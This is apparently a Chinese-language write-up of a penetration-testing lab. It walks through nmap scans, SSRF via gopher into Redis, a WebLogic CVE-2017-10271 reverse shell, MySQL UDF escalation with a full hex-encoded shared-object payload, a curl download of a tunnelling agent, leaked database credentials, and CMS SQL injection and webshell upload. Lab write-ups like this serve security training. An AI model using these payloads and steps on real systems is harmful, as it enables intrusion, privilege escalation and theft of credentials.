成都愚安科技靶场

介绍

时间 : 两天左右

端口扫描

$ nmap -sT -p- --min-rate 1000 146.56.239.110
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 00:39 CST
Nmap scan report for 146.56.239.110
Host is up (0.057s latency).
Not shown: 65525 closed tcp ports (conn-refused)
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
6379/tcp  open  redis
7001/tcp  open  afs3-callback
8081/tcp  open  blackice-icecap
8082/tcp  open  blackice-alerts
8848/tcp  open  unknown
13306/tcp open  unknown
22883/tcp open  unknown
58080/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 82.02 seconds

$ nmap -sTCV -p 22,80,6379,7001,8081,8082,8848,13306,22883,58080 --min-rate 1000 146.56.239.110
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-09 00:41 CST
Nmap scan report for 146.56.239.110
Host is up (0.10s latency).

PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
|   3072 96:6c:9c:16:24:02:09:58:33:eb:a8:bd:01:a6:0b:ff (RSA)
|   256 72:da:18:1b:5e:33:f0:ce:bf:56:ad:6b:ee:c7:ce:7c (ECDSA)
|_  256 c1:55:d8:b4:1d:d3:05:09:51:cd:b0:b0:57:d3:32:7f (ED25519)
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Hello!
6379/tcp  open  redis   Redis key-value store 4.0.14
7001/tcp  open  http    Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
|_http-title: Error 404--Not Found
|_weblogic-t3-info: T3 protocol in use (WebLogic version: 10.3.6.0)
8081/tcp  open  http    Apache Tomcat 10.1.16
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/10.1.16
8082/tcp  open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-cookie-flags:
|   /:
|     PHPSESSID:
|_      httponly flag not set
|_http-server-header: Apache/2.4.7 (Ubuntu)
| http-robots.txt: 6 disallowed entries
| /install/ /data/ /includes/ /languages/ /member/
|_/template/
|_http-title: BEES\xE4\xBC\x81\xE4\xB8\x9A\xE7\xBD\x91\xE7\xAB\x99\xE7\xAE\xA1\xE7\x90\x86\xE7\xB3\xBB\xE7\xBB\x9F_\xE4\xBC\x81\xE4\xB8\x9A\xE5\xBB\xBA\xE7\xAB\x99\xE7\xB3\xBB\xE7\xBB\x9F_\xE5\xA4\x96\xE8\xB4\xB8\xE7\xBD\x91\xE7\xAB\x99\xE5\xBB...
8848/tcp  open  unknown
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 404
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 431
|     Date: Fri, 08 Dec 2023 16:41:27 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 404
|     Found</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 404
|     Found</h1></body></html>
|   RTSPRequest:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Fri, 08 Dec 2023 16:41:27 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|_    Request</h1></body></html>
13306/tcp open  mysql   MySQL 5.7.44
| mysql-info:
|   Protocol: 10
|   Version: 5.7.44
|   Thread ID: 6
|   Capabilities flags: 65535
|   Some Capabilities: InteractiveClient, SupportsTransactions, SwitchToSSLAfterHandshake, LongPassword, IgnoreSpaceBeforeParenthesis, Speaks41ProtocolOld, Support41Auth, IgnoreSigpipes, DontAllowDatabaseTableColumn, Speaks41ProtocolNew, SupportsCompression, LongColumnFlag, ODBCClient, FoundRows, ConnectWithDatabase, SupportsLoadDataLocal, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: \x175;=#vXx   \x1C\x02Q\x0By3a3(.}
|_  Auth Plugin Name: mysql_native_password
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_5.7.44_Auto_Generated_Server_Certificate
| Not valid before: 2023-12-08T02:40:24
|_Not valid after:  2033-12-05T02:40:24
22883/tcp open  unknown
| fingerprint-strings:
|   GetRequest, HTTPOptions:
|     HTTP/1.1 500
|     X-Content-Type-Options: nosniff
|     X-XSS-Protection: 1; mode=block
|     Cache-Control: no-cache, no-store, max-age=0, must-revalidate
|     Pragma: no-cache
|     Expires: 0
|     X-Frame-Options: DENY
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 455
|     Date: Fri, 08 Dec 2023 16:41:27 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 500
|     Internal Server Error</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 500
|_    Internal Server Error</h1></body></html>
58080/tcp open  unknown
| fingerprint-strings:
|   GetRequest:
|     HTTP/1.1 302
|     Set-Cookie: JSESSIONID=0EFBAEC932D0C1D65F9345910368D27B; Path=/; HttpOnly
|     Location: http://localhost:8080/login;jsessionid=0EFBAEC932D0C1D65F9345910368D27B
|     Content-Length: 0
|     Date: Fri, 08 Dec 2023 16:41:26 GMT
|     Connection: close
|   HTTPOptions:
|     HTTP/1.1 302
|     Set-Cookie: JSESSIONID=6A9313FE260225F7AB12AAC3ECA192A7; Path=/; HttpOnly
|     Location: http://localhost:8080/login;jsessionid=6A9313FE260225F7AB12AAC3ECA192A7
|     Content-Length: 0
|     Date: Fri, 08 Dec 2023 16:41:26 GMT
|     Connection: close
|   RPCCheck:
|     HTTP/1.1 400
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 435
|     Date: Fri, 08 Dec 2023 16:41:26 GMT
|     Connection: close
|     <!doctype html><html lang="en"><head><title>HTTP Status 400
|     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400
|     Request</h1></body></html>
|   RTSPRequest:
|     HTTP/1.1 505
|     Content-Type: text/html;charset=utf-8
|     Content-Language: en
|     Content-Length: 465
|     Date: Fri, 08 Dec 2023 16:41:26 GMT
|     <!doctype html><html lang="en"><head><title>HTTP Status 505
|     HTTP Version Not Supported</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 505
|_    HTTP Version Not Supported</h1></body></html>
3 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :

简单总结一下端口扫描的情况:

80 : 已经验证存在 SSRF 漏洞
6379 : Redis 获取可以借此写入 webShell 或者定时任务之类的内容
7001 : Oracle WebLogic Server 10.3.6.0
8081 : Tomcat 10.1.16 , 需要密码才可以访问管理界面, 或许可以读取配置文件来进行尝试
8082 : BEES CMS 站点, 或许可以找找历史遗留漏洞尝试一下
8848 : 404
13306 : Mysql 服务
22883 : 500
58080 : 直接显示一个登陆界面

Web1

80

直接访问站点, 一眼直接 SSRF 漏洞 20240518193754 利用伪协议稍微用一下就可以发现读取到了 /etc/passwd 20240518193828 然后查看了一些特殊的文件比如 : /etc/hosts 文件基于此我知道了这个 80 端口对应的主机IP为 172.18.240.5 之后按照题目的提示信息, 我知道了内网的一个范围, 之后按照此范围进行枚举看看内网存活什么主机, 我在此枚举了 80 和 6379 最终发现在 172.18.240.7 主机存在 redis 直接 gopher 协议就可以拿到 172.18.240.7 主机的 Shell 20240518193906

Shell

172.18.240.7

利用 gopher 协议就可以获取到 172.18.240.7 主机的会话

20240518194209

tip

第一个 flag 直接在 80 端口执行 file:///flag1
第二个 flag 在 172.18.240.7 的定时任务
第三个 flag 在 172.18.240.7 的 root 目录下

Web2

7001

对于 7001 服务是一个 WebLogic 并且告知了版本搜索过后发现一个利用脚本 CVE-2017-10271 20240518194818

Shell

172.16.10.8/172.25.20.10 (root)

执行上面的脚本后就可以获取到一个反向 Shell 20240518194922 之后基于此开始上传 nmap 进行内网扫描, 发现一个存活主机 172.25.20.12 从其名称来看是一个 mysql 服务器进行端口扫描发现只开启了 3306 , 那么此 weblogic 估计会对 Mysql 进行一些访问因此估计存在 mysql 的账号和密码因此我决定按照这个思路来进行发掘

(remote) root@0ff84b81962d:/root# ./nmap -sn  172.16.10.8/24

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-08 19:32 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.16.10.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000011s latency).
MAC Address: 02:42:23:5F:02:A4 (Unknown)
Nmap scan report for 0ff84b81962d (172.16.10.8)
Host is up.
Nmap done: 256 IP addresses (2 hosts up) scanned in 3.76 seconds
(remote) root@0ff84b81962d:/root# ./nmap -sn  172.25.20.10/24

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-08 19:32 UTC
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.25.20.1
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.000020s latency).
MAC Address: 02:42:21:09:D7:1E (Unknown)
Nmap scan report for 2-mysql_udf-1.2_ntwo (172.25.20.12)
Host is up (0.000010s latency).
MAC Address: 02:42:AC:19:14:0C (Unknown)
Nmap scan report for 0ff84b81962d (172.25.20.10)
Host is up.
Nmap done: 256 IP addresses (3 hosts up) scanned in 3.76 seconds
(remote) root@0ff84b81962d:/root# ./nmap -sT -p- --min-rate 1000 172.25.20.12

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-08 19:35 UTC
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 2-mysql_udf-1.2_ntwo (172.25.20.12)
Cannot find nmap-mac-prefixes: Ethernet vendor correlation will not be performed
Host is up (0.00014s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE
3306/tcp open  mysql
MAC Address: 02:42:AC:19:14:0C (Unknown)

经过一番搜索后, 确实如我所猜想的那般, 我终于找到了对应的数据库账号和密码, 可惜密码是加密的还是 AES [/(ㄒoㄒ)/~~] 20240518195040 之后又是一系列的查找和询问最终我发现了解密的方法, 最终得到密码 Meetsec#1024 登陆 Mysql 冲冲冲 20240518195103

172.25.20.12/172.26.30.4 (Mysql)

设置代理访问 172.25.20.0/24 网段的主机 20240518202731 在这里获取到一个 Mysql 的交互环境, 并且数据库中没有什么内容, 只能进行 UDF 提权了, 可以参考 MySQL 漏洞利用与提权进行操作

MySQL [data]> SELECT 0x7f454c4602010100000000000000000003003e0001000000d00c0000000000004000000000000000e8180000000000000000000040003800050040001a00190001000000050000000000000000000000000000000000000000000000000000001415000000000000141500000000000000002000000000000100000006000000181500000000000018152000000000001815200000000000700200000000000080020000000000000000200000000000020000000600000040150000000000004015200000000000401520000000000090010000000000009001000000000000080000000000000050e57464040000006412000000000000641200000000000064120000000000009c000000000000009c00000000000000040000000000000051e5746406000000000000000000000000000000000000000000000000000000000000000000000000000000000000000800000000000000250000002b0000001500000005000000280000001e000000000000000000000006000000000000000c00000000000000070000002a00000009000000210000000000000000000000270000000b0000002200000018000000240000000e00000000000000040000001d0000001600000000000000130000000000000000000000120000002300000010000000250000001a0000000f000000000000000000000000000000000000001b00000000000000030000000000000000000000000000000000000000000000000000002900000014000000000000001900000020000000000000000a00000011000000000000000000000000000000000000000d0000002600000017000000000000000800000000000000000000000000000000000000000000001f0000001c0000000000000000000000000000000000000000000000020000000000000011000000140000000200000007000000800803499119c4c93da4400398046883140000001600000017000000190000001b0000001d0000002000000022000000000000002300000000000000240000002500000027000000290000002a00000000000000ce2cc0ba673c7690ebd3ef0e78722788b98df10ed871581cc1e2f7dea868be12bbe3927c7e8b92cd1e7066a9c3f9bfba745bb073371974ec4345d5ecc5a62c1cc3138aff36ac68ae3b9fd4a0ac73d1c525681b320b5911feab5fbe120000000000000000000000000000000000000000000000000000000003000900a00b0000000000000000000000000000010000002000000000000000000000000000000000000000250000002000000000000000000000000000000000000000e0000000120000000000000000000000de01000000000000790100001200000000000000000000007700000000000000ba0000001200000000000000000000003504000000000000f5000000120000000000000000000000c2010000000000009e010000120000000000000000000000d900000000000000fb000000120000000000000000000000050000000000000016000000220000000000000000000000fe00000000000000cf000000120000000000000000000000ad00000000000000880100001200000000000000000000008000000000000000ab010000120000000000000000000000250100000000000010010000120000000000000000000000dc00000000000000c7000000120000000000000000000000c200000000000000b5000000120000000000000000000000cc02000000000000ed000000120000000000000000000000e802000000000000e70000001200000000000000000000009b00000000000000c200000012000000000000000000000028000000000000008001000012000b007a100000000000006e000000000000007500000012000b00a70d00000000000001000000000000001000000012000c00781100000000000000000000000000003f01000012000b001a100000000000002d000000000000001f01000012000900a00b0000000000000000000000000000c30100001000f1ff881720000000000000000000000000009600000012000b00ab0d00000000000001000000000000007001000012000b0066100000000000001400000000000000cf0100001000f1ff981720000000000000000000000000005600000012000b00a50d00000000000001000000000000000201000012000b002e0f0000000000002900000000000000a301000012000b00f71000000000000041000000000000003900000012000b00a40d00000000000001000000000000003201000012000b00ea0f0000000000003000000000000000bc0100001000f1ff881720000000000000000000000000006500000012000b00a60d00000000000001000000000000002501000012000b00800f0000000000006a000000000000008500000012000b00a80d00000000000003000000000000001701000012000b00570f00000000000029000000000000005501000012000b0047100000000000001f00000000000000a900000012000b00ac0d0000000000009a000000000000008f01000012000b00e8100000000000000f00000000000000d700000012000b00460e000000000000e800000000000000005f5f676d6f6e5f73746172745f5f005f66696e69005f5f6378615f66696e616c697a65005f4a765f5265676973746572436c6173736573006c69625f6d7973716c7564665f7379735f696e666f5f6465696e6974007379735f6765745f6465696e6974007379735f657865635f6465696e6974007379735f6576616c5f6465696e6974007379735f62696e6576616c5f696e6974007379735f62696e6576616c5f6465696e6974007379735f62696e6576616c00666f726b00737973636f6e66006d6d6170007374726e6370790077616974706964007379735f6576616c006d616c6c6f6300706f70656e007265616c6c6f630066676574730070636c6f7365007379735f6576616c5f696e697400737472637079007379735f657865635f696e6974007379735f7365745f696e6974007379735f6765745f696e6974006c69625f6d7973716c7564665f7379735f696e666f006c69625f6d7973716c7564665f7379735f696e666f5f696e6974007379735f657865630073797374656d007379735f73657400736574656e76007379735f7365745f6465696e69740066726565007379735f67657400676574656e76006c6962632e736f2e36005f6564617461005f5f6273735f7374617274005f656e6400474c4942435f322e322e35000000000000000000020002000200020002000200020002000200020002000200020002000200020001000100010001000100010001000100010001000100010001000100010001000100010001000100010001000100000001000100b20100001000000000000000751a690900000200d401000000000000801720000000000008000000000000008017200000000000d01620000000000006000000020000000000000000000000d81620000000000006000000030000000000000000000000e016200000000000060000000a00000000000000000000000017200000000000070000000400000000000000000000000817200000000000070000000500000000000000000000001017200000000000070000000600000000000000000000001817200000000000070000000700000000000000000000002017200000000000070000000800000000000000000000002817200000000000070000000900000000000000000000003017200000000000070000000a00000000000000000000003817200000000000070000000b00000000000000000000004017200000000000070000000c00000000000000000000004817200000000000070000000d00000000000000000000005017200000000000070000000e00000000000000000000005817200000000000070000000f00000000000000000000006017200000000000070000001000000000000000000000006817200000000000070000001100000000000000000000007017200000000000070000001200000000000000000000007817200000000000070000001300000000000000000000004883ec08e827010000e8c2010000e88d0500004883c408c3ff35320b2000ff25340b20000f1f4000ff25320b20006800000000e9e0ffffffff252a0b20006801000000e9d0ffffffff25220b20006802000000e9c0ffffffff251a0b20006803000000e9b0ffffffff25120b20006804000000e9a0ffffffff250a0b20006805000000e990ffffffff25020b20006806000000e980ffffffff25fa0a20006807000000e970ffffffff25f20a20006808000000e960ffffffff25ea0a20006809000000e950ffffffff25e20a2000680a000000e940ffffffff25da0a2000680b000000e930ffffffff25d20a2000680c000000e920ffffffff25ca0a2000680d000000e910ffffffff25c20a2000680e000000e900ffffffff25ba0a2000680f000000e9f0feffff00000000000000004883ec08488b05f50920004885c07402ffd04883c408c390909090909090909055803d900a2000004889e5415453756248833dd809200000740c488b3d6f0a2000e812ffffff488d05130820004c8d2504082000488b15650a20004c29e048c1f803488d58ff4839da73200f1f440000488d4201488905450a200041ff14c4488b153a0a20004839da72e5c605260a2000015b415cc9c3660f1f8400000000005548833dbf072000004889e57422488b05530920004885c07416488d3da70720004989c3c941ffe30f1f840000000000c9c39090c3c3c3c331c0c3c341544883c9ff4989f455534883ec10488b4610488b3831c0f2ae48f7d1488d69ffe8b6feffff83f80089c77c61754fbf1e000000e803feffff488d70ff4531c94531c031ffb921000000ba07000000488d042e48f7d64821c6e8aefeffff4883f8ff4889c37427498b4424104889ea4889df488b30e852feffffffd3eb0cba0100000031f6e802feffff31c0eb05b8010000005a595b5d415cc34157bf00040000415641554531ed415455534889f34883ec1848894c24104c89442408e85afdffffbf010000004989c6e84dfdffffc600004889c5488b4310488d356a030000488b38e814feffff4989c7eb374c89f731c04883c9fff2ae4889ef48f7d1488d59ff4d8d641d004c89e6e8ddfdffff4a8d3c284889da4c89f64d89e54889c5e8a8fdffff4c89fabe080000004c89f7e818fdffff4885c075b44c89ffe82bfdffff807d0000750a488b442408c60001eb1f42c6442dff0031c04883c9ff4889eff2ae488b44241048f7d148ffc94889084883c4184889e85b5d415c415d415e415fc34883ec08833e014889d7750b488b460831d2833800740e488d353a020000e817fdffffb20188d05ec34883ec08833e014889d7750b488b460831d2833800740e488d3511020000e8eefcffffb20188d05fc3554889fd534889d34883ec08833e027409488d3519020000eb3f488b46088338007409488d3526020000eb2dc7400400000000488b4618488b384883c70248037808e801fcffff31d24885c0488945107511488d351f0200004889dfe887fcffffb20141585b88d05dc34883ec08833e014889f94889d77510488b46088338007507c6010131c0eb0e488d3576010000e853fcffffb0014159c34154488d35ef0100004989cc4889d7534889d34883ec08e832fcffff49c704241e0000004889d8415a5b415cc34883ec0831c0833e004889d7740e488d35d5010000e807fcffffb001415bc34883ec08488b4610488b38e862fbffff5a4898c34883ec28488b46184c8b4f104989f2488b08488b46104c89cf488b004d8d4409014889c6f3a44c89c7498b4218488b0041c6040100498b4210498b5218488b4008488b4a08ba010000004889c6f3a44c89c64c89cf498b4218488b400841c6040000e867fbffff4883c4284898c3488b7f104885ff7405e912fbffffc3554889cd534c89c34883ec08488b4610488b38e849fbffff4885c04889c27505c60301eb1531c04883c9ff4889d7f2ae48f7d148ffc948894d00595b4889d05dc39090909090909090554889e5534883ec08488b05c80320004883f8ff7419488d1dbb0320000f1f004883eb08ffd0488b034883f8ff75f14883c4085bc9c390904883ec08e86ffbffff4883c408c345787065637465642065786163746c79206f6e6520737472696e67207479706520706172616d657465720045787065637465642065786163746c792074776f20617267756d656e747300457870656374656420737472696e67207479706520666f72206e616d6520706172616d6574657200436f756c64206e6f7420616c6c6f63617465206d656d6f7279006c69625f6d7973716c7564665f7379732076657273696f6e20302e302e34004e6f20617267756d656e747320616c6c6f77656420287564663a206c69625f6d7973716c7564665f7379735f696e666f290000011b033b980000001200000040fbffffb400000041fbffffcc00000042fbffffe400000043fbfffffc00000044fbffff1401000047fbffff2c01000048fbffff44010000e2fbffff6c010000cafcffffa4010000f3fcffffbc0100001cfdffffd401000086fdfffff4010000b6fdffff0c020000e3fdffff2c02000002feffff4402000016feffff5c02000084feffff7402000093feffff8c0200001400000000000000017a5200017810011b0c070890010000140000001c00000084faffff01000000000000000000000014000000340000006dfaffff010000000000000000000000140000004c00000056faffff01000000000000000000000014000000640000003ffaffff010000000000000000000000140000007c00000028faffff030000000000000000000000140000009400000013faffff01000000000000000000000024000000ac000000fcf9ffff9a00000000420e108c02480e18410e20440e3083048603000000000034000000d40000006efaffffe800000000420e10470e18420e208d048e038f02450e28410e30410e38830786068c05470e50000000000000140000000c0100001efbffff2900000000440e100000000014000000240100002ffbffff2900000000440e10000000001c0000003c01000040fbffff6a00000000410e108602440e188303470e200000140000005c0100008afbffff3000000000440e10000000001c00000074010000a2fbffff2d00000000420e108c024e0e188303470e2000001400000094010000affbffff1f00000000440e100000000014000000ac010000b6fbffff1400000000440e100000000014000000c4010000b2fbffff6e00000000440e300000000014000000dc01000008fcffff0f00000000000000000000001c000000f4010000fffbffff4100000000410e108602440e188303470e2000000000000000000000ffffffffffffffff0000000000000000ffffffffffffffff000000000000000000000000000000000100000000000000b2010000000000000c00000000000000a00b0000000000000d00000000000000781100000000000004000000000000005801000000000000f5feff6f00000000a00200000000000005000000000000006807000000000000060000000000000060030000000000000a00000000000000e0010000000000000b0000000000000018000000000000000300000000000000e81620000000000002000000000000008001000000000000140000000000000007000000000000001700000000000000200a0000000000000700000000000000c0090000000000000800000000000000600000000000000009000000000000001800000000000000feffff6f00000000a009000000000000ffffff6f000000000100000000000000f0ffff6f000000004809000000000000f9ffff6f0000000001000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000401520000000000000000000000000000000000000000000ce0b000000000000de0b000000000000ee0b000000000000fe0b0000000000000e0c0000000000001e0c0000000000002e0c0000000000003e0c0000000000004e0c0000000000005e0c0000000000006e0c0000000000007e0c0000000000008e0c0000000000009e0c000000000000ae0c000000000000be0c0000000000008017200000000000004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200004743433a202844656269616e20342e332e322d312e312920342e332e3200002e7368737472746162002e676e752e68617368002e64796e73796d002e64796e737472002e676e752e76657273696f6e002e676e752e76657273696f6e5f72002e72656c612e64796e002e72656c612e706c74002e696e6974002e74657874002e66696e69002e726f64617461002e65685f6672616d655f686472002e65685f6672616d65002e63746f7273002e64746f7273002e6a6372002e64796e616d6963002e676f74002e676f742e706c74002e64617461002e627373002e636f6d6d656e7400000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000f0000000500000002000000000000005801000000000000580100000000000048010000000000000300000000000000080000000000000004000000000000000b000000f6ffff6f0200000000000000a002000000000000a002000000000000c000000000000000030000000000000008000000000000000000000000000000150000000b00000002000000000000006003000000000000600300000000000008040000000000000400000002000000080000000000000018000000000000001d00000003000000020000000000000068070000000000006807000000000000e00100000000000000000000000000000100000000000000000000000000000025000000ffffff6f020000000000000048090000000000004809000000000000560000000000000003000000000000000200000000000000020000000000000032000000feffff6f0200000000000000a009000000000000a009000000000000200000000000000004000000010000000800000000000000000000000000000041000000040000000200000000000000c009000000000000c00900000000000060000000000000000300000000000000080000000000000018000000000000004b000000040000000200000000000000200a000000000000200a0000000000008001000000000000030000000a0000000800000000000000180000000000000055000000010000000600000000000000a00b000000000000a00b000000000000180000000000000000000000000000000400000000000000000000000000000050000000010000000600000000000000b80b000000000000b80b00000000000010010000000000000000000000000000040000000000000010000000000000005b000000010000000600000000000000d00c000000000000d00c000000000000a80400000000000000000000000000001000000000000000000000000000000061000000010000000600000000000000781100000000000078110000000000000e000000000000000000000000000000040000000000000000000000000000006700000001000000320000000000000086110000000000008611000000000000dd000000000000000000000000000000010000000000000001000000000000006f000000010000000200000000000000641200000000000064120000000000009c000000000000000000000000000000040000000000000000000000000000007d000000010000000200000000000000001300000000000000130000000000001402000000000000000000000000000008000000000000000000000000000000870000000100000003000000000000001815200000000000181500000000000010000000000000000000000000000000080000000000000000000000000000008e000000010000000300000000000000281520000000000028150000000000001000000000000000000000000000000008000000000000000000000000000000950000000100000003000000000000003815200000000000381500000000000008000000000000000000000000000000080000000000000000000000000000009a000000060000000300000000000000401520000000000040150000000000009001000000000000040000000000000008000000000000001000000000000000a3000000010000000300000000000000d016200000000000d0160000000000001800000000000000000000000000000008000000000000000800000000000000a8000000010000000300000000000000e816200000000000e8160000000000009800000000000000000000000000000008000000000000000800000000000000b1000000010000000300000000000000801720000000000080170000000000000800000000000000000000000000000008000000000000000000000000000000b7000000080000000300000000000000881720000000000088170000000000001000000000000000000000000000000008000000000000000000000000000000bc000000010000000000000000000000000000000000000088170000000000009b000000000000000000000000000000010000000000000000000000000000000100000003000000000000000000000000000000000000002318000000000000c500000000000000000000000000000001000000000000000000000000000000 INTO DUMPFILE '/usr/lib64/mysql/plugin/udf64.so';
Query OK, 1 row affected (0.004 sec)

MySQL [data]> CREATE FUNCTION sys_eval RETURNS STRING SONAME 'udf64.so';
Query OK, 0 rows affected (0.003 sec)

MySQL [data]> select * from mysql.func;
+----------+-----+----------+----------+
| name     | ret | dl       | type     |
+----------+-----+----------+----------+
| sys_eval |   0 | udf64.so | function |
+----------+-----+----------+----------+
1 row in set (0.003 sec)

MySQL [data]> select sys_eval('whoami');
+--------------------+
| sys_eval('whoami') |
+--------------------+
| mysql              |
+--------------------+
1 row in set (0.008 sec)

MySQL [data]> select sys_eval('id');
+-------------------------------------------------+
| sys_eval('id')                                  |
+-------------------------------------------------+
| uid=999(mysql) gid=999(mysql) groups=999(mysql) |
+-------------------------------------------------+
1 row in set (0.007 sec)

MySQL [data]>

之后查看对应主机的 /etc/hosts 文件我知道了这个数据库的 IP 同时发现了新的网段, 然后开始挂二级代理吧, 之后我利用 172.25.20.10 主机向 172.25.20.12 主机上传了 linux_x64_agent 之后, 并赋予其执行的权限

MySQL [data]> select sys_eval('curl http://172.25.20.10:8000/linux_x64_agent -o /tmp/linux_x64_agent');
+-----------------------------------------------------------------------------------+
| sys_eval('curl http://172.25.20.10:8000/linux_x64_agent -o /tmp/linux_x64_agent') |
+-----------------------------------------------------------------------------------+
| NULL                                                                              |
+-----------------------------------------------------------------------------------+
1 row in set (0.014 sec)

MySQL [data]> select sys_eval('ls /tmp/linux_x64_agent');
+-------------------------------------+
| sys_eval('ls /tmp/linux_x64_agent') |
+-------------------------------------+
| /tmp/linux_x64_agent                |
+-------------------------------------+
1 row in set (0.010 sec)

MySQL [data]> select sys_eval('chmod +x /tmp/linux_x64_agent');
+-------------------------------------------+
| sys_eval('chmod +x /tmp/linux_x64_agent') |
+-------------------------------------------+
| NULL                                      |
+-------------------------------------------+
1 row in set (0.009 sec)

20240518203038 20240518203047

172.26.30.11

使用 nmap 对目标网段进行扫描, 发现了新的主机 172.26.30.11

bash-4.2$ ./nmap -sn 172.26.30.4/24

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-09 11:37 GMT
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 172.26.30.1
Host is up (0.00019s latency).
Nmap scan report for 917a4a8430cf (172.26.30.4)
Host is up (0.000084s latency).
Nmap scan report for 2-log4j2-1.2_ntwo2 (172.26.30.11)
Host is up (0.000086s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 14.91 seconds

bash-4.2$ ./nmap -sT -p- 172.26.30.11

Starting Nmap 6.49BETA1 ( http://nmap.org ) at 2023-12-09 11:39 GMT
Unable to find nmap-services!  Resorting to /etc/services
Cannot find nmap-payloads. UDP payloads are disabled.
Nmap scan report for 2-log4j2-1.2_ntwo2 (172.26.30.11)
Host is up (0.000092s latency).
Not shown: 65534 closed ports
PORT     STATE SERVICE
8983/tcp open  unknown

Nmap done: 1 IP address (1 host up) scanned in 1.29 seconds

之后设置代理, 访问这个服务, 我们可以在此看到版本信息, 经过查找我发现其存在 Log4j 漏洞 20240518203159 现在我们需要进行一些转发, 让利用 Mysql 主机做代理, 将第三台主机的流量通过第二台主机放出来, 可惜不知道什么原因, 利用不了, 难受

Web3

22883

进行目录扫描, 这里第一次打的时候, 并没有什么进展, 因为我的字典里面根本没有对应的内容, 在扫描后可以发现一个目录 actuator 这是 SpringBoot 的未授权漏洞 20240518203420 之后还可以发现一个 /actuator/headdump 我们将其下载应该可以从中获取到一个 Mysql 的账号

[password = MeetSec@2nd!2022, jdbcUrl = jdbc:mysql://mysql_heapdump:13306/db, username = meetsec]

资源

对应的 SpringBoot 泄露文件可以在共享资料/Resources/heapdump.hprof 下载

13306

20240518235310

tip

Flag 在数据库中

Web5

8082

访问发现其是一个 CMS程序, 经过我的搜索我发现其存在一系列的漏洞, 我从中进行筛选最终选择了在管理员登陆进行 SQL 注入操作, 因为在登陆时我发现当我输入用户名为 admin' or 1=1 -- - 其报错为登陆用户的密码错误而不是用户不存在, 所以是先判断用户存在与否才进行进一步验证密码, 因此配置联合注入直接进行攻击, 之后就可以访问管理员界面 20240519000154 之后进入管理员界面, 我们就可以开始考虑上传 WebShell 进行进一步攻击了, 再次搜索发现一个对应的方式, 通过在 /admin/upload.php 上传内容后端仅仅通过 Content-Type 做校验因此完全可以绕过

